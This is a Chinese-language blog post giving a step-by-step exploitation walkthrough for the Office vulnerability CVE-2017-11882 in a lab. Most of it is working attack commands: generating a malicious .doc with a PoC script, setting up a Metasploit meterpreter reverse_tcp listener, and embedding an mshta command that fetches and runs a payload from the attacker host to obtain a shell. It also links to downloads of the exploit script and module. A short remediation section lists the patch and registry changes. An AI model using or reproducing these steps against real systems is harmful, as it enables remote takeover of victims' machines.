CVE-2017-11882漏洞利用
CVE-2017-11882漏洞利用
最新Office的CVE-2017-11882的poc刚刚发布出来,让人眼前一亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于企业来说危害很大。在此简单说下这个漏洞的复现和利用过程。
POC地址:https://github.com/Ridter/CVE-2017-11882/
下载Command43b_CVE-2017-11882.py脚本文件(文末分享云盘链接)。
使用的方法很简单,执行下面命令,生成漏洞doc文件。
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
使用office 2013打开,直接执行。
关于怎么进一步利用,可以利用msf进行攻击。
这里有个小技巧,因为命令长度有43字符的限制,可以使用URIPATH设置路径,尽量短一点,避免加起来超过43字符。
这里我仔细说一下,希望每个人都能看懂。
准备阶段:
kali:192.168.104
win7:192.168.1.132
win7里面的doc文件可以用office打开。我的win7虚拟机用的是office2013(文末分享)
首先打开kali,查看 IP,可以看到我的虚拟机kali的 IP是192.168.1.104。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就可以。接下来就要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一起吧。
ms17-010.rb文件的路径是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把PS_shell.rb放smb下面,和ms17-010在一起。
准备工作做好了,接下来就是msf上场了。
输入msfconsole,然后reload_all,重新加载所有模块。
接下来输入命令:search PS_shell
use /exploits/windows/smb/PS_shell
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.104
set uripath abc
exploit
会出现 started reverse tcp hander on 192.168.1.104:4444
using url,local ip,,,
mshta.exe "http://192.168.1.104:8080/abc"
接下来就到了 Command43b_CVE-2017-11882.py 上场了。
前面说到,我们是把py文件放 kali 桌面的,所以在 kali 执行的时候路径要注意。
cd Desktop
输入命令:python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.104:8080/abc" -o test.doc
会在同目录生成 test.doc 文件。
然后复制到 win7里面用 office2013 打开。
win7 打开的时候,msf 输入 sessions
成功返回 shell。
具体请看截图,至此CVE-2017-11882漏洞利用结束,下面还可以进行一系列渗透了。
修复方案:
1.下载微软对此漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882,并且开启自动更新功能
2.在注册表中禁用该漏洞模块
reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400
Command43b_CVE-2017-11882.py:(链接: https://pan.baidu.com/s/1hslbc80 密码: 5ap6)
PS_shell.rb:(链接: https://pan.baidu.com/s/1gfF5jmN 密码: rkwy)
office2013:(链接: https://pan.baidu.com/s/1eSElsrC 密码: q66f)
本文链接(http://www.cnblogs.com/Oran9e/p/7880832.html),转载请注明。
任重而道远!